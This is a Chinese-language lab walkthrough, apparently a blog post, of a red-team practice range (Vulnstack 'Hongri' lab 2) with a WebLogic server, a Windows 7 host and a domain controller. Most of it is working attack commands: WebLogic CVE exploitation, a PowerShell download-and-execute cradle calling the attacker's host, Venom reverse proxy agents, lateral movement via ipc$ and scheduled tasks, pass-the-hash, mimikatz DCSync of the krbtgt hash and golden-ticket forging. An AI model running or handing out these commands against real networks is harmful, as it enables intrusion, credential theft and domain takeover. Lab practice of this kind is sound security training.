ATT&CK实战系列-红队实战(二)
红日靶场第二弹,内网相关不太熟练,用来记录一下过程。
靶场下载地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
但是百度云链接好像是G了,网上搜索了一波存在了我自己的百度网盘。
链接: https://pan.baidu.com/s/16G9Tim03fvbflJdX89jXjQ 提取码: kvqr 复制这段内容后打开百度网盘手机App,操作更方便哦
靶机配置
DC(域控) :仅有内网ip 10.10.10.10 OS:Windows 2012(64)
PC(域内主机):内网ip 10.10.10.201 外网ip 192.168.31.133 OS:Windows 7(32)
WEB(WEB服务器):内网ip 10.10.10.80 外网ip 192.168.31.69 OS:Windows 2008(64)
本机Mac(攻击机):192.168.31.222
WEB主机以administrator第一次登录时没有密码,登录后会要求重新设置密码 我改为qwertyuiop123.
其它两台主机默认登录密码为1qaz@WSX
WEB主机进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin
以管理员身份运行strartWebLogic.cmd
外网渗透
老规矩我们先对WEB服务器进行端口扫描,查看下端口开放状态。
开放7001端口weblogic 验证weblogic是否存在漏洞。
WeblogicScan可以对漏洞进行一键检测
存在漏洞
- CVE-2017-3506
- CVE-2019-2725
- CVE-2019-2729
实际上 CVE-2019-2725和CVE-2019-2729属于一个漏洞,CVE-2019-2729是对CVE-2019-2725的补丁进行绕过。
利用正常
为了方便后续渗透我这边生成一个cs不落地的马进行上线。
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.31.222:80/a'))"发现360会直接给拦截并弹窗。。。GG
后面我也用冰蝎反弹shell给msf,发现还是被拦截。。
(先360放行一下在执行不落地马)
内网信息收集
拿到了目标Web服务器的权限后,我们开始对目标主机及其所在的网络环境进行信息收集。
systeminfo //查看系统信息
ipconfig /all //查看ip段所在域等等
发现两个网卡并且存在域delay
有域存在我就收集一波域内信息
net view /domain 查询域列表
net time /domain 从域控查询时间,若当前用户是域用户会从域控返回当前时间,亦用来判断主域,主域一般用做时间服务器
net localgroup administrators 本机管理员【通常含有域用户】
net user /domain 查询域用户(当前域)
net group /domain 查询域工作组
net group "domain computers" /domain 查看加入域的所有计算机名
net group "domain admins" /domain 查询域管理员用户组和域管用户
net group "Enterprise Admins" /domain 查看域管理员组
net localgroup administrators /domain 查看域管理员
net group "domain controllers" /domain 查看域控
net accounts /domain 查看域密码策略
ping 域控计算机名 查找域控地址
ipconfig /all 通常域内主机 DNS 地址就是域控地址
域控主机名为DC
net group "domain computers" /domain #查看域内主机
net group "domain controllers" /domain #查看域控
net localgroup administrators /domain #查看域管理员
如上信息可知存在域环境 且域名为de1ay.com
域内有三台主机,两台域成员 主机名为PC、WEB
一台域控制器DC.de1ay.com 主机名为DC。域管理员为Administrator。
接下来我们上个代理,https://github.com/Dliv3/Venom
上传agent.exe到对方服务器进行反向链接我们Mac攻击机
本机监听
./admin_macos_x64 -lport 8777目标发起链接
shell C:\Oracle\Middleware\user_projects\domains\base_domain\agent.exe -rhost 192.168.31.222 -rport 8777
上Nmap扫C段
proxychains4 nmap -A -F -sT -Pn 10.10.10.1/24 > nmap_res.txt速度巨慢。。
直接上fscan
shell C:\Oracle\Middleware\user_projects\domains\base_domain\fscan32.exe -h 10.10.10.1/24 -np
通过扫描结果发现内网中存在10.10.10.10和10.10.10.201这两台主机,对应主机为DC和PC
并且都存在永恒之蓝漏洞。
接下来把msf代理进内网,试试永恒之蓝
在msfconsole里面执行
setg Proxies socks5:192.168.31.222:6666把msf代理进内网(也可以添加路由)
我们先打一下10.10.10.201 PC这台机器看看。。
失败了,正好来复习一下其他姿势
mimikatz抓密码
有了用户名和密码,拿下PC、DC就简单多了。
为了方便我们CobaltStrike类型的session后,派生一个MSF类型的shell
横向移动
控制Web主机与PC建立一个ipc$连接
shell net use \\10.10.10.201\ipc$ "qwertyuiop123." /user:administrator然后我们新生成一个msf木马shell.exe上传到web主机,然后在web主机上执行如下命令,将木马复制到远程主机PC上去。
shell copy C:\Users\Administrator\Desktop\shell.exe \\10.10.10.201\c$查看下是否成功复制过去了。
shell dir \\10.10.10.201\c$
复制木马shell.exe 到PC主机中然后使用计划任务运行此程序
#创建计划任务
schtasks /create /tn "sec" /tr c:\\shell.exe /sc once /st 20:40 /S 10.10.10.201 /RU System /u administrator /p "qwertyuiop123."
#立即执行计划任务
schtasks /run /tn "sec" /S 10.10.10.201 /u administrator /p "qwertyuiop123."
#删除计划任务
schtasks /F /delete /tn "plugin_update" /S 192.168.1.1 /u administrator /p "1qaz@WSX"
利用计划任务成功使PC主机上线。
进攻域控
既然抓到了密码我们使用cs进行hash传递攻击
成功上线
域控搞定。
黄金票据权限维持
黄金票据一般用于拿下域控主机后的权限维持。
假设又这么一种情况,我们已拿到的域内所有的账户Hash,包括krbtgt账户,由于有些原因导致你对域管权限丢失,但好在你还有一个普通域用户权限,碰巧管理员在域内加固时忘记重置krbtgt密码,基于此条件,我们还能利用该票据重新获得域管理员权限,利用krbtgt的HASH值可以伪造生成任意的TGT(mimikatz),能够绕过对任意用户的账号策略,让用户成为任意组的成员,可用于Kerberos认证的任何服务。
我们在DC域控中用mimikatz在msf中导出 krbtgt的NTLM hash
shell c:\\mimikatz.exe "lsadump::dcsync /domain:DE1AY.com /user:krbtgt" "exit"拿到sid和 NTLM Hash 注意SID不要后面的502
然后,我们切换到普通域用户的WEB主机或PC主机,用mimikatz生成名为gold.kirbi的TGT凭证,用户名为域管理员用户(administrator):
构造黄金票据
shell c:\\mimikatz.exe "kerberos::golden /domain:DE1AY.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /user:sec /ticket:gold.kirbi" "exit"
生成TGT凭证gold.kirbi成功,名为gold.kirbi,然后再在mimikatz中将凭证gold.kirbi注入进去:
kerberos::purge //先清空所有票据
kerberos::ptt gold.kirbi //再将生成的票据注入域用户主机Windows7中
// kerberos::ptt <票据文件>shell c:\\mimikatz.exe "kerberos::purge" "kerberos::ptt gold.kirbi" "exit"
此时我们的票据应该已经注入进里面了,用kerberos::tgt确认一下
shell c:\\mimikatz.exe "kerberos::tgt" "exit"
到此注入成功。
此时,攻击者就可以利用这台普通域用户的主机任意访问域控制器了,如下列出域控的C盘目录。
shell dir \\DC\c$
也可以使用psexec,wmi等方法通过PC、WEB主机对DC进行远程执行命令了,具体操作不再演示。